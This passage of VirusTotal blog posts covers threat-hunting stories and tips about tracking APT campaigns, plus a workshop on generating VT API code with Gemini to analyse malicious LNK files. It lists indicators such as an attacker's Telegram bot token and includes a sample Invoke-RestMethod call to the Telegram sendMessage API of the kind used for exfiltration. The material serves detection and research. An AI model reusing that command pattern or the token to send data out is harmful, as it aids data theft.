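            "INSERT OR IGNORE INTO seen_urls (id, url) VALUES (?, ?)",
            (item["id"], url),
        )
        if cur.rowcount == 1:
            new_urls.append(url)
    conn.commit()
    return new_urls

# Hypothetical data standing in for two consecutive daily runs.
conn = sqlite3.connect(":memory:")
day1 = [{"id": "a1", "attributes": {"url": "http://example.test/doc.rtf"}}]
day2 = day1 + [{"id": "b2", "attributes": {"url": "http://example.test/new.rtf"}}]
print(store_and_diff(conn, day1))
print(store_and_diff(conn, day2))
```

In a scheduled job you would replace ":memory:" with a file path so the table persists between runs, and pass all_itw_urls as the items argument.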

The great forgotten one: VT Diff

We are always pleased to read research that uses VT Diff, as it is a genuinely useful tool for creating YARA rules.

When analyzing a set of related samples, use the VT Diff feature to spot commonalities and variations. This can help you identify patterns, such as repeated strings, hardcoded values, or metadata artifacts that indicate automated generation.

As the Acronis team notes, "We used the VT Diff functionality to compare variations between samples and quickly spot patterns, such as repeated words, hexadecimal values, URLs, or metadata tags that hinted at automated generation (i.e. the string “Generado Automaticamente”)".
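To make the idea concrete, the kind of commonality described in the quote can be approximated locally. The sketch below is not how VT Diff works internally. It simply extracts printable ASCII strings from each sample and keeps those present in every one, which are natural candidates for YARA strings. The helper names and the sample bytes are hypothetical.

```python
import re

def printable_strings(data: bytes, min_len: int = 6) -> set[bytes]:
    """Extract runs of printable ASCII that are at least min_len bytes long."""
    return set(re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data))

def common_strings(samples: list[bytes], min_len: int = 6) -> set[bytes]:
    """Return the strings shared by every sample in the set."""
    if not samples:
        return set()
    shared = printable_strings(samples[0], min_len)
    for data in samples[1:]:
        shared &= printable_strings(data, min_len)
    return shared

# Hypothetical sample contents, for illustration only.
samples = [
    b"\x00\x01<svg><!-- Generado Automaticamente -->\x00id=1111\x00",
    b"\x02<svg><!-- Generado Automaticamente -->\x00\x00id=2222\x03",
]
print(common_strings(samples))
```

Strings that differ between samples, such as the id values here, drop out of the intersection, leaving only the stable artifacts.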

You can easily use VT Diff from multiple places: intelligence search results, collections, campaigns, reports, VT Graph…

Creation of VT Diff from a Report

Conclusion

The examples shared by the Acronis Threat Research Unit in tracking campaigns like FileFix, SideWinder, and Shadow Vector demonstrate the power of VT as a comprehensive threat intelligence and hunting platform. By leveraging a combination of proactive Livehunt rules, deep content analysis, and rich metadata pivoting, security researchers can effectively uncover and track elusive and evolving threats.

These examples highlight that successful threat hunting is not just about having the right tools, but about applying creative and persistent investigation techniques. The ability to pivot from a simple YARA rule to a full-fledged campaign analysis, as Acronis did, is crucial to connecting the dots and revealing the full scope of an attack. From hunting for clipboard manipulation in web-based threats to tracking decade-old exploits and analyzing malicious SVG decoys, the Acronis team has demonstrated a deep understanding of modern threat hunting, and we appreciate them sharing their valuable insights with the community.

We hope this blog has been insightful and will help you in your own threat-hunting endeavors. The fight against cybercrime is a collective effort, and the more we share our knowledge and experiences, the stronger we become as a community.

If you have a success story of using VirusTotal that you would like to share with the community, we would be delighted to hear from you. Please reach out to us at practitioners@virustotal.com, and we will be happy to feature your story in a future blog post.

Together, we can make the digital world a safer place.

VirusTotal Blog
VTPRACTITIONERS{SEQRITE}: Tracking UNG0002, Silent Lynx and DragonClone 21 October 2025 at 10:40

VTPRACTITIONERS{SEQRITE}: Tracking UNG0002, Silent Lynx and DragonClone

By: Joseliyo Sánchez

21 October 2025 at 10:40

Introduction

One of the best parts of being at VirusTotal (VT) is seeing all the amazing ways our community uses our tools to hunt down threats. We love hearing about your successes, and we think the rest of the community would too.

That's why we're so excited to start a new blog series where we'll be sharing success stories from some of our customers. They'll be giving us a behind-the-scenes look at how they pivot from an initial clue to uncover entire campaigns.

To kick things off, we're thrilled to have our friends from SEQRITE join us. Their APT-Team is full of incredible threat hunters, and they've got a great story to share about how they've used VT to track some sophisticated actors.

How VT plays a role in hunting for analysts

For a threat analyst, the hunt often begins with a single, seemingly isolated clue—a suspicious file, a strange domain, or an odd IP address. The challenge is to connect that one piece of the puzzle to the larger picture. This is where VT truly shines.

VT is more than just a tool for checking if a file is malicious. It's a massive, living database of digital artifacts (process activity, registry key activity, memory dumps, LLM verdicts, among others) and their relationships. It allows analysts to pivot from one indicator of compromise to another, uncovering hidden connections and mapping out entire attack campaigns. It's this ability to connect the dots—to see how a piece of malware communicates with a C2 server, what other files are associated with it, what processes were launched or files were used to set persistence or exfiltrate information, and who else has seen it—that transforms a simple file check into a full-blown investigation. The following story from SEQRITE is a perfect example of this process in action.

Seqrite - Success Story

[In the words of SEQRITE…]

We at SEQRITE APT-Team perform a wide range of activities, including threat hunting and threat intelligence, using customer telemetry and multiple other data corpuses. Beyond our customer telemetry, the VT corpus has been a significant aid to our research: hunting unique campaigns and pivoting across them has led us to an interesting set of campaigns spanning Central, South, and East Asia.

UNG0002

SEQRITE APT-Team has been tracking a South-East Asian threat entity, termed UNG0002, using certain behavioral artefacts, such as similar OPSEC mistakes repeated across multiple campaigns and a similar set of decoys and post-exploitation toolkit across operational campaigns ranging from May 2024 to May 2025.

During the initial phase of this campaign, the threat actor targeted multiple organizations across Hong Kong and Pakistan in sectors including defence, electrotechnical, medical science, academia and more.

VT corpus has helped us to pivot through Cobalt Strike oriented beacons, which were used by this threat actor to target various sectors. In our hunt for malicious activity, we discovered a series of Cobalt Strike beacons. These were all delivered through similar ZIP files, which acted as lures. Each ZIP archive contained the same set of file types: a malicious executable, along with LNK, VBS, and PDF decoy files. The beacons themselves were also similar, sharing configurations, filenames and compilation timestamps.

Using the timestamps from the malicious executables and the filenames previously mentioned, we discovered up to 14 different samples, all of them related to the campaign, with this query:

VirusTotal query: metadata:"2015:07:10 03:27:31+00:00" filename:"imebroker.exe"

Based on the configuration extracted by VT, we could use the extracted public key to identify more samples using exactly the same key with the following query:

malware_config:30819f300d06092a864886f70d010101050003818d003081890281810096cc4e6ad9aee91ca69b7b44465e17412626a11c7855b7a69daad00f48c0ea98f0e389a0a1c4b74332bf0d603a6e53e05ee734c9a289ff172204bfc9430ed4d6041402d02b526e902b95f6f219598cb1b6391403fa627ab36dbe88646620369e7ec89bdc31f1a2b0bedba1852d5e7656d3b297f9d39f357816f0677563bc496b020301000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Besides these executables, the ZIP files also contained LNK files, as mentioned above. Analyzing them revealed consistent LNK-ID metadata, with the same identifiers across many samples. Querying VT for those LNK-IDs allowed us to identify new files related to the campaign.

VirusTotal query: metadata:"laptop-g5qalv96"

Decoy documents identified within the ZIP files mentioned above

We initially tracked several campaigns leveraging LNK-based device IDs and Cobalt Strike beacons. However, an intriguing shift began to emerge in the September-October activity. We observed a new set of campaigns that frequently used CV-themed decoys, often impersonating students from prominent Chinese research institutions.

While the spear-phishing tactics remained similar, the final execution changed. The threat actors dropped their Cobalt Strike beacons and pivoted toward DLL-Sideloading for their payloads, all while keeping the same decoy theme. This significant change in technique led us to identify a second major wave of this activity, which we're officially labeling Operation AmberMist.

Tracking this second wave of operations attributed to the UNG0002 cluster, we observed a recurring behavioral artifact: the use of academia-themed lures targeting victims in China and Hong Kong.

Across these campaigns, multiple queries were leveraged, but a consistent pattern emerged—heavy reliance on LOLBINS such as wscript.exe, cscript.exe, and VBScripts for persistence.

By developing a simple yet effective hunting query, we were able to uncover a previously unseen sample not publicly reported:

type:zip AND (metadata:"lnk" AND metadata:".vbs" AND metadata:".pdf") and submitter:HK

Silent Lynx

Another campaign tracked by the SEQRITE APT-team, named Silent Lynx, targeted multiple sectors including banking. As in the previously described case, thanks to VT we were able to pivot and identify new samples associated with this campaign.

Initial Discovery and Pivoting

During the initial phase of this campaign, we discovered a decoy-based SPECA-related archive file targeting Kyrgyzstan around December 2024 - January 2025. The decoy was designed to distract from the real payload: a malicious C++ implant.

Decoy document identified during our research

Second campaign of Silent Lynx @ Bank of Kyrgyz Republic

Email identified during our research

We performed multiple pivots focusing on the implant. Starting from the sample’s metadata, network indicators and functionality, we found that the threat actor had been using a similar C++ implant, which led us to another Silent Lynx campaign targeting the banking sector of Kyrgyzstan.

Information obtained during the analysis of the C++ implants

We leveraged the VT corpus to deploy multiple Livehunt rules at multiple junctures. Some of the simpler examples are as follows:

Looking at the usage of encoded Telegram Bot based payload inside the C++ implant. Using either content or malware_config modifiers when extracted from the config could help us to identify new samples.
Spawning Powershell.exe LOLBIN.
VT search enablers for checking for malicious email files, if uploaded from Central Asian Geosphere.
ISO-oriented first-stagers.
Multiple behavioral overlaps between YoroTrooper & Silent Lynx and further hunting hypothesis developed by us.

Leveraging the VT corpus and pivoting further on the above metrics, and on many others included in the malicious spear-phishing email, we also tracked some further campaigns. Most importantly, each time we developed a new YARA rule and a new hypothesis to hunt for similar implants with the Livehunt feature, tailored to the specifications and raw data we obtained during hunting, while keeping false positives and false negatives in mind.

Decoy document identified during our hunting activities

Submissions identified in the decoy document

The threat actor repeatedly used the same implant across multiple campaigns in Uzbekistan and Turkmenistan. Using hunting queries through VT along with submitter:UZ or submitter:TM helped us to identify these samples.
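The country filter can be attached to any hunting query programmatically. The sketch below is a hypothetical helper (with_submitters is not part of any VirusTotal library) and the base query is only a placeholder, not the query used in the investigation.

```python
def with_submitters(base_query: str, countries: list[str]) -> str:
    """Append a submitter filter covering the given ISO country codes."""
    if not countries:
        return base_query
    clause = " OR ".join(f"submitter:{c.upper()}" for c in countries)
    return f"({base_query}) AND ({clause})"

# Placeholder base query; substitute the hunting query that fits your case.
print(with_submitters('type:peexe behavior:"powershell.exe"', ["uz", "tm"]))
```

The resulting string can be pasted into VT Intelligence search or passed as the query parameter of an API search.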

The most important pivot in our investigation was the malware sample itself: as shown in the previous screenshots, it used an encoded PowerShell blob spawning powershell.exe, which was reused multiple times across different campaigns. This sample acted as a key indicator, allowing us to uncover other campaigns targeting critical sectors in the region, and confirmed the repetitive nature of the actor's operations.

We also leveraged VT's Collections feature to build the attribution of the threat entity.

Collections used during the attribution process

DragonClone

Finally, the last campaign we want to use to illustrate how pivoting within the VT ecosystem enabled our team to uncover new samples is by a group we named DRAGONCLONE.

The SEQRITE APT Team has been monitoring DRAGONCLONE as they actively target critical sectors across Asia and the globe. They utilize sophisticated methods for cyber-espionage, compromising strategic organizations in sectors like telecom and energy through the deployment of custom malware implants, the exploitation of unpatched vulnerabilities, and extensive spear-phishing.

Initial Discovery

Recently, on 13th May, our team discovered a malicious ZIP file that surfaced across various sources, including VT. The ZIP file was used as a preliminary infection vector and contained multiple EXE and DLL files inside the archive, like this one which contains the malicious payload.

Chinese-based threat actors have a well-known tendency to deliver DLL sideloading implants as part of their infection chains. Leveraging crowdsourced Sigma rules in VT, along with personal hunting techniques using static YARA signatures, we were able to track and hunt this malicious spear-phishing attachment effectively. In their public Sigma Rules list you can find different Sigma Rules that are created to identify DLL SideLoading.

Pivoting Certificates via VT Corpus

While exploring the network of related artifacts, we could not initially find any direct commonalities. However, a particular clean-looking executable named “2025 China Mobile Tietong Co., Ltd. Internal Training Program” raised our concern. Its naming and metadata suggested potential masquerading behavior, making it a critical pivot point that required deeper investigation.

Certificates are among the most important indicators when looking into malicious artefacts. We saw that the file is a fresh and clean copy of WonderShare’s Repairit Software, a well-known tool for repairing corrupted files; the suspicious part is that it has been signed by ShenZhen Thunder Networking Technologies Ltd.

VirusTotal query: signature:"ShenZhen Thunder Networking Technologies Ltd."

Following this hunch, we hunted for other executables signed with the same certificate and found multiple malicious binaries. This has not been the only indicator or pivot, but it was a key one for finding further ones.

Pivoting on Malware Configs via VT Corpus

We analyzed the loader and determined it's slightly advanced, performing complex tasks like anti-debugging. More significantly, it drops V-Shell, a post-exploitation toolkit. V-Shell was originally open-source but later taken down by its authors and has been observed in campaigns by Earth Lamia.

After extracting the V-Shell shellcode, we discovered an unusual malware configuration property: qwe123qwe. By leveraging the VT corpus to pivot on this finding, we were able to identify additional V-Shell implant samples potentially linked to this campaign.

VirusTotal query: malware_config:"qwe123qwe"

VT Tips (based on the success story)

[In the words of VirusTotal…]

Threat hunting is an art, and a good artist needs the right tools and techniques. In this section, we'll share some practical tips for pivoting and hunting within the VirusTotal ecosystem, inspired by the techniques used in the campaigns discussed in this blog post.

Hunt by Malware Configuration

Many malware families use configuration files to store C2 information, encryption keys, and other operational data. For some malware families, VirusTotal automatically extracts these configurations. You can use unique values from these configurations to find other samples from the same campaign.

For instance, in the DRAGONCLONE investigation, the V-Shell implant had an unusual malware configuration property: qwe123qwe. A simple query like malware_config:"qwe123qwe" in VT can reveal other samples using the same configuration. Similarly, the Cobalt Strike beacons used by UNG0002 had a unique public key in their configuration that could be used for pivoting. This extraction is possible thanks to Backscatter. We've written blogs showing how to do advanced hunting using only the malware_config modifier. Remember that you can search for samples by family name, like malware_config:"redline", by Telegram tokens, and even by URLs configured in the malware configuration, like malware_config:"https://steamcommunity.com/profiles/76561198780612393".

Don't Overlook LNK File Metadata

Threat actors often make operational security (OPSEC) mistakes. One common mistake is failing to remove metadata from files, including LNK (shortcut) files. This metadata can reveal information about the attacker's machine, such as the hostname.

In the UNG0002 campaign, the actor consistently used LNK files with the same metadata, specifically the machine identifier laptop-g5qalv96. We know that attackers can also modify this information to deceive security researchers, but it often yields reliable data that can be used to track them. This allowed the SEQRITE team to uncover a wider set of samples by querying VirusTotal for this metadata string.
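When you have already retrieved a batch of LNK file objects, clustering them by machine identifier makes reused hostnames stand out. This is a minimal sketch, assuming each object is a dictionary with the identifier under attributes → lnk_info → machine_id. The helper name and the sample records are hypothetical.

```python
from collections import defaultdict

def group_by_machine_id(files: list[dict]) -> dict[str, list[str]]:
    """Map each LNK machine identifier to the IDs of the files that carry it."""
    groups = defaultdict(list)
    for f in files:
        machine_id = f.get("attributes", {}).get("lnk_info", {}).get("machine_id")
        if machine_id:
            # Normalize case so the same hostname is not split into two clusters.
            groups[machine_id.lower()].append(f["id"])
    return dict(groups)

# Hypothetical records; real ones would come from an API search.
files = [
    {"id": "hash1", "attributes": {"lnk_info": {"machine_id": "laptop-g5qalv96"}}},
    {"id": "hash2", "attributes": {"lnk_info": {"machine_id": "LAPTOP-G5QALV96"}}},
    {"id": "hash3", "attributes": {"lnk_info": {"machine_id": "desktop-example"}}},
    {"id": "hash4", "attributes": {}},
]
print(group_by_machine_id(files))
```

Clusters with many files under a single identifier are good candidates for a follow-up metadata query.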

Track Actors via Leaked Bot Tokens

Some malware, especially those using public platforms for command and control, will have hardcoded API tokens. As seen in the "Silent Lynx" campaign, a PowerShell script used a hardcoded Telegram bot token for C2 communication and data exfiltration.

These tokens can be extracted from memory dumps during sandbox execution or from the malware's code itself. Once you have a token, you may be able to track the threat actor's commands and even identify other victims, as was done in the Silent Lynx investigation. A concrete example of using Telegram bot tokens is the query malware_config:"bot7213845603:AAFFyxsyId9av6CCDVB1BCAM5hKLby41Dr8", which is associated with four infostealer samples uploaded between 2024 and 2025.
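Extracting tokens from script text or memory strings can be automated with a regular expression. The sketch below assumes the commonly observed token shape (a numeric bot ID of 8 to 10 digits, a colon, and 35 URL-safe characters), which matches the example above but is an assumption rather than a documented guarantee. The function names are hypothetical.

```python
import re

# Assumed shape: 8-10 digit bot ID, a colon, then 35 URL-safe characters.
BOT_TOKEN = re.compile(r"(?<!\d)(\d{8,10}:[A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")

def find_bot_tokens(text: str) -> list[str]:
    """Return unique Telegram-style bot tokens in order of first appearance."""
    seen = []
    for token in BOT_TOKEN.findall(text):
        if token not in seen:
            seen.append(token)
    return seen

def to_vt_query(token: str) -> str:
    """Build a malware_config search for a token, using the bot<token> form."""
    return f'malware_config:"bot{token}"'

text = (
    "Invoke-RestMethod https://api.telegram.org/"
    "bot7213845603:AAFFyxsyId9av6CCDVB1BCAM5hKLby41Dr8/sendMessage"
)
for t in find_bot_tokens(text):
    print(to_vt_query(t))
```

Run against the strings of a suspicious script, this yields ready-made queries to check whether the same bot appears in other samples.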

Leverage Code-Signing Certificates

Threat actors sometimes sign their malicious executables to make them appear legitimate. They may use stolen certificates or freshly created ones. These certificates can be a powerful pivot point.

In the DRAGONCLONE case, a suspicious executable was signed by "ShenZhen Thunder Networking Technologies Ltd.". By searching for other files signed with the same certificate (signature:"ShenZhen Thunder Networking Technologies Ltd."), you can uncover other tools in the attacker's arsenal.

Utilize YARA and Sigma Rules

For proactive hunting, you can develop your own YARA rules to find malware families based on unique strings, code patterns, or other characteristics. This was a key technique in the "Silent Lynx" campaign for hunting similar implants.

Additionally, you can leverage the power of the community by using crowdsourced Sigma rules in VirusTotal, even within your YARA rules. These rules can help you identify malicious behaviors, such as the DLL sideloading techniques used by DRAGONCLONE, directly from sandbox execution data.

For example, if you want to search for the Sigma rule "Potential DLL Sideloading Of MsCorSvc.DLL" in VT files, you can use the query sigma_rule:99b4e5347f2c92e8a7aeac6dc7a4175104a8ba3354e022684bd3780ea9224137 to do so. All the Sigma rules are updated from the public repo and can be consumed here.

Conclusion

The success stories of the SEQRITE APT-Team in tracking campaigns like UNG0002, Silent Lynx, and DRAGONCLONE demonstrate the power of VirusTotal as a collaborative and comprehensive threat intelligence platform. By leveraging a combination of malware configuration analysis, metadata pivoting, and community-driven tools like YARA and Sigma rules, security researchers can effectively uncover and track sophisticated threat actors.

These examples highlight that successful threat hunting is not just about having the right tools, but also about applying creative and persistent investigation techniques. The ability to pivot from one piece of evidence to another is crucial in connecting the dots and revealing the full scope of a campaign. The SEQRITE team has demonstrated a deep understanding of these pivoting techniques, and we appreciate that they have decided to share their valuable insights with the rest of the community.

We hope these tips and stories have been insightful and will help you in your own threat-hunting endeavors. The fight against cybercrime is a collective effort, and the more we share our knowledge and experiences, the stronger we become as a community.

Together, we can make the digital world a safer place.

VirusTotal Blog
Advanced Threat Hunting: Automating Large-Scale Operations with LLMs 30 September 2025 at 10:16

Advanced Threat Hunting: Automating Large-Scale Operations with LLMs

By: Joseliyo Sánchez

30 September 2025 at 10:16

Last week, we were fortunate enough to attend the fantastic LABScon conference, organized by the SentinelOne Labs team. While there, we presented a workshop titled 'Advanced Threat Hunting: Automating Large-Scale Operations with LLMs.' The main goal of this workshop was to show attendees how they could automate their research using the VirusTotal API and Gemini. Specifically, we demonstrated how to integrate the power of Google Colab to quickly and efficiently generate Jupyter notebooks using natural language.

It goes without saying that the use of LLMs is a must for every analyst today. For this reason, we also want to make life easier for everyone who uses the VirusTotal API for research.

The Power of the VirusTotal API and vt-py

The VirusTotal API is the programmatic gateway to our massive repository of threat intelligence data. While the VirusTotal GUI is great for agile querying, the API unlocks the ability to conduct large-scale, automated investigations and access raw data with more pivoting opportunities.

To make interacting with the API even easier, we recommend using the vt-py library. It simplifies much of the complexity of HTTP requests, JSON parsing, and rate limit management, making it the go-to choice for Python users.

From Natural Language to Actionable Intelligence with Gemini

To bridge the gap between human questions and API queries, we can leverage the integrated Gemini in Google Colab. We have created a "meta Colab" notebook that is pre-populated with real, working code snippets for interacting with the VirusTotal API to retrieve different information such as campaigns, threat actors, malware, samples, and URLs, among others (which we will share soon). This provides Gemini with the necessary context to understand your natural language requests and generate accurate Python code to query the VirusTotal API. Gemini doesn't call the API directly; it creates the code snippet for you to execute.

For Gemini to generate accurate and relevant code, it needs context. Our meta Colab notebook is filled with examples that act as a guide. For complex questions, it helps to provide the exact field names that you want to work with. This context generally falls into two categories:

Reference Documentation: We include detailed documentation directly in the Colab. For example, we provide a comprehensive list of all available file search modifiers for the VirusTotal Intelligence search endpoint. This gives Gemini the "vocabulary" it needs to construct precise queries.
Working Code Examples: The notebook is pre-populated with dozens of working vt-py code snippets for common tasks like retrieving file information, performing an intelligence search, or getting relationships. This gives Gemini the "grammar" and correct patterns for interacting with our API.

Example of code snippet context that we have included in our meta colab:

query_results_with_behaviors = []
query = "have:sigma have:yara have:ids have:malware_config fs:1d+ have:bundled_file tag:overlay"
RELATIONS = "behaviours"

async for itemobj in cli.iterator('/intelligence/search',params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): '*'},limit=0):
    query_results_with_behaviors.append(itemobj.to_dict())

res_with_behaviors = list(query_results_with_behaviors)

Diagram showing the flow from User's Action to Actionable Intelligence via Gemini and VirusTotal API

Practical Example: Hunting for Malicious LNK Files

One of the exercises in our workshop focused on analyzing malicious LNK files submitted to VirusTotal in a specific period of time to limit results. The goal was to discover common execution techniques and interesting command-line patterns.

Here’s how you could approach this with natural language queries in our meta Colab:

1. Retrieve all LNK file objects matching the criteria.

You can start by asking Gemini:

Create a code snippet to retrieve all LNK files submitted from January 1st, 2025, until April 1st, 2025, with 5 or more positives.

Code generated:

query_results = []

# Query for LNK files submitted between January 1st, 2025, and April 1st, 2025, with 5 or more positives.
query = "fs:2025-01-01+ fs:2025-04-01- p:5+ type:lnk"

async for itemobj in cli.iterator('/intelligence/search',params={'query': "%s"%(query)},limit=0):
    query_results.append(itemobj.to_dict())

lnk_files = list(query_results)
print(f"Found {len(lnk_files)} LNK files matching the criteria.")

2. Flatten the data and visualize it.

Next, you can ask Gemini to process the retrieved data and create visualizations:

Flatten the data in a dataframe and create a bar chart depicting the most common TargetFileDOSName values.

Code generated:

import pandas as pd
import plotly.express as px

# Extract the 'attributes' dictionary from each object in our results
attributes_list = [result.get('attributes', {}) for result in lnk_files]

# Use json_normalize to create a flat DataFrame
df_flat = pd.json_normalize(attributes_list)

# Check if 'exiftool.TargetFileDOSName' column exists and is not empty
if 'exiftool.TargetFileDOSName' in df_flat.columns and not df_flat['exiftool.TargetFileDOSName'].empty:
    # Count the occurrences of each TargetFileDOSName
    target_file_counts = df_flat['exiftool.TargetFileDOSName'].value_counts().reset_index()
    target_file_counts.columns = ['TargetFileDOSName', 'Count']

    # Get the top 10 most common TargetFileDOSName values for visualization
    top_target_files = target_file_counts.head(10)

    # Create an interactive bar chart
    fig = px.bar(top_target_files,
                 x='Count',
                 y='TargetFileDOSName',
                 orientation='h',
                 title='Top 10 Most Common TargetFileDOSName in LNK files',
                 labels={'Count': 'Number of Occurrences', 'TargetFileDOSName': 'Target File DOS Name'})
    fig.show()
else:
    print("The 'exiftool.TargetFileDOSName' column was not found or is empty in the flattened data.")

print("DataFrame shape:", df_flat.shape)
df_flat.head()

This will generate a code snippet using pandas and Plotly to give you a clear view of the most frequent target files in the malicious LNKs.
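Column names such as exiftool.TargetFileDOSName come from the flattening step, which joins nested keys with dots. The sketch below shows roughly what that does to a single record using only the standard library. It is an illustration rather than the pandas implementation, and the sample attribute values are hypothetical.

```python
def flatten(record: dict, parent: str = "", sep: str = ".") -> dict:
    """Flatten nested dictionaries into a single level with dotted keys."""
    flat = {}
    for key, value in record.items():
        name = f"{parent}{sep}{key}" if parent else key
        if isinstance(value, dict):
            flat.update(flatten(value, name, sep))
        else:
            # Lists and scalars are kept as-is.
            flat[name] = value
    return flat

# Hypothetical attributes of a single LNK file object.
attributes = {
    "exiftool": {"TargetFileDOSName": "cmd.exe"},
    "lnk_info": {
        "machine_id": "desktop-example",
        "header": {"show_window_str": "SW_SHOWMINNOACTIVE"},
    },
}
print(flatten(attributes))
```

Knowing the dotted names in advance makes it easier to give Gemini the exact field you want charted.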

3. Visualize relationships with a Sankey diagram.

To dig deeper and understand the relationship between the machines where the LNK files were created and the files they point to, you can ask for a more advanced visualization:

Create a Sankey diagram connecting MachineID (source) to TargetFileDOSName (target), with link widths representing the number of occurrences. Include only MachineID values with 10 or more occurrences, grouping the rest as "Other", and make the visualization interactive with hover details.

Code generated:

import plotly.graph_objects as go
import pandas as pd

# Ensure df_flat is available from previous steps
# If not, you might need to re-run the cell that creates df_flat.

# Check if necessary columns exist in df_flat
if 'lnk_info.machine_id' in df_flat.columns and 'exiftool.TargetFileDOSName' in df_flat.columns:

    # Calculate the frequency of each machine ID and target file name pair
    pair_frequencies = df_flat.groupby(['lnk_info.machine_id', 'exiftool.TargetFileDOSName']).size().reset_index(name='frequency')

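    # Identify MachineIDs with fewer than 10 occurrences
    machine_id_counts = pair_frequencies.groupby('lnk_info.machine_id')['frequency'].sum().reset_index(name='count')
    other_machine_ids = machine_id_counts[machine_id_counts['count'] < 10]['lnk_info.machine_id']

    # Assumption: infrequent MachineIDs are relabeled "Other" and the pairs re-aggregated
    pair_frequencies['machine_id_grouped'] = pair_frequencies['lnk_info.machine_id'].where(
        ~pair_frequencies['lnk_info.machine_id'].isin(other_machine_ids), 'Other')
    grouped = pair_frequencies.groupby(['machine_id_grouped', 'exiftool.TargetFileDOSName'])['frequency'].sum().reset_index()

    # Assumption: nodes are listed sources first, then targets, and mapped to indices
    sources = grouped['machine_id_grouped'].unique().tolist()
    targets = grouped['exiftool.TargetFileDOSName'].unique().tolist()
    labels = sources + targets
    source_idx = grouped['machine_id_grouped'].map({s: i for i, s in enumerate(sources)})
    target_idx = grouped['exiftool.TargetFileDOSName'].map({t: i + len(sources) for i, t in enumerate(targets)})

    fig = go.Figure(data=[go.Sankey(
        node=dict(pad=15, thickness=20, label=labels),
        link=dict(
            source=source_idx,
            target=target_idx,
            value=grouped['frequency'],
            # Hover text: "MachineID -> TargetFileDOSName: count"
            label=grouped.apply(lambda row: f"{row['machine_id_grouped']} -> {row['exiftool.TargetFileDOSName']}: {row['frequency']}", axis=1)
        )
    )])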

    fig.update_layout(title_text="MachineID to TargetFileDOSName Sankey Diagram (Infrequent MachineIDs grouped as 'Other')", font_size=10)
    fig.show()
else:
    print("Required columns 'lnk_info.machine_id' or 'exiftool.TargetFileDOSName' not found in the DataFrame.")

This will create a powerful visualization that shows which target files are associated with each MachineID, allowing us to identify patterns for each MachineID value.

4. Analyze the behavior of the LNK files.

Finally, you can investigate the behavior of the LNK files themselves, for example, by looking at how they are executed:

Create a pie chart depicting the distribution of window behaviors for LNK target processes (hidden, minimized,...).

Code generated:

import plotly.express as px
import pandas as pd

# Check if the relevant column exists
if 'lnk_info.header.show_window_str' in df_flat.columns and not df_flat['lnk_info.header.show_window_str'].empty:
    # Count the occurrences of each window behavior string
    window_behavior_counts = df_flat['lnk_info.header.show_window_str'].value_counts().reset_index()
    window_behavior_counts.columns = ['Window Behavior', 'Count']

    # Create an interactive pie chart
    fig = px.pie(window_behavior_counts,
                 names='Window Behavior',
                 values='Count',
                 title='Distribution of LNK Target Process Window Behaviors',
                 hover_data={'Count': True})
    fig.show()
else:
    print("The 'lnk_info.header.show_window_str' column was not found or is empty in the flattened data. Cannot create the pie chart.")

This allows you to quickly identify whether the LNK files are trying to hide their execution, a common malware technique.

5. Geographic Threat Mapping of Submissions

Understanding the geographical distribution of malware submissions can provide crucial insights into whether a campaign is widespread or targeting a specific region. By analyzing the submission metadata for our set of LNK files, an analyst can quickly identify potential hotspots, which could indicate a geographically focused attack. This is achieved by fetching the submissions relationship for each file, extracting the country of origin for each submission, and plotting this data on a world map (please note that the country of a submission is not necessarily the targeted country, although in some cases the two are related).

Using the LNK files identified previously, create a code snippet that retrieves the submissions relationship for each file. Then, count the number of submissions from each country and display the results on a choropleth world map to visualize the submission hotspots.

In this case, Gemini uses step-by-step execution, which is essentially a sequence of consecutive executions. The code generated was:

Step 1

query_results_with_submissions = []

# Define the search query string for LNK files
query = "fs:2025-01-01+ fs:2025-04-01- p:5+ type:lnk"

# Define the relationship to request
RELATIONS = "submissions"

# Define the relationship attributes to retrieve (all attributes)
ATTRIBUTES_RELATIONS = "*"

# Use cli.iterator to perform an intelligence search with the specified query, relationships, and relationship attributes.
async for itemobj in cli.iterator('/intelligence/search', params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): ATTRIBUTES_RELATIONS}, limit=0):
    query_results_with_submissions.append(itemobj.to_dict())

# Convert query_results_with_submissions to a list called lnk_files_with_submissions
lnk_files_with_submissions = list(query_results_with_submissions)

# Print the number of LNK files found with submission data.
print(f"Found {len(lnk_files_with_submissions)} LNK files with submission data matching the criteria.")

Step 2

import pandas as pd

# Initialize an empty list to store submission countries
submission_countries = []

# Iterate through each item (LNK file) in the lnk_files_with_submissions list
for item in lnk_files_with_submissions:
    # Check if 'relationships' and 'submissions' exist and are not empty
    if 'relationships' in item and 'submissions' in item['relationships'] and item['relationships']['submissions']['data']:
        # Iterate through each submission object
        for submission in item['relationships']['submissions']['data']:
            # Extract the 'country' from 'submission['attributes']' and append it to the list
            if 'country' in submission['attributes']:
                submission_countries.append(submission['attributes']['country'])

# Convert the submission_countries list into a pandas Series
submission_countries_series = pd.Series(submission_countries)

# Count the occurrences of each country and store in a DataFrame
country_counts = submission_countries_series.value_counts().reset_index()
country_counts.columns = ['country', 'count']

print(f"Total unique countries found: {len(country_counts)}")
print("Top 5 submission countries:")
print(country_counts.head())

Step 3

!pip install pycountry
import plotly.express as px
import pandas as pd
import pycountry

# Function to get ISO-3 code from country name
def get_iso3(country_name):
    try:
        return pycountry.countries.search_fuzzy(country_name)[0].alpha_3
    except:
        return None

# Apply the function to get ISO-3 codes
country_counts['iso_alpha'] = country_counts['country'].apply(get_iso3)

# Create a world heatmap using Plotly Express with ISO-3 codes
fig = px.choropleth(country_counts.dropna(subset=['iso_alpha']), # Drop rows where ISO code couldn't be found
                      locations="iso_alpha", # Use ISO-3 codes for locations
                      locationmode='ISO-3',   # Specify ISO-3 location mode
                      color="count",
                      hover_name="country",
                      color_continuous_scale="Viridis",
                      title="Submission Country Heatmap")

# Update layout to increase figure size
fig.update_layout(
    autosize=False,
    width=1000, # Adjust width as needed
    height=600 # Adjust height as needed
)

fig.show()

More Examples

Here are some other examples of how you can use natural language to query the VirusTotal API:

Find malicious Chrome extensions (based on this blog):

This specific question is a good example of how Google Colab runs the step-by-step process. As you can see, we asked several questions in the same prompt, so Gemini answers them in separate steps.

Retrieve all the samples from the /intelligence/search endpoint with the following query: fs:2025-08-01+ fs:2025-08-14- p:5+ tag:crx have:codeinsight.

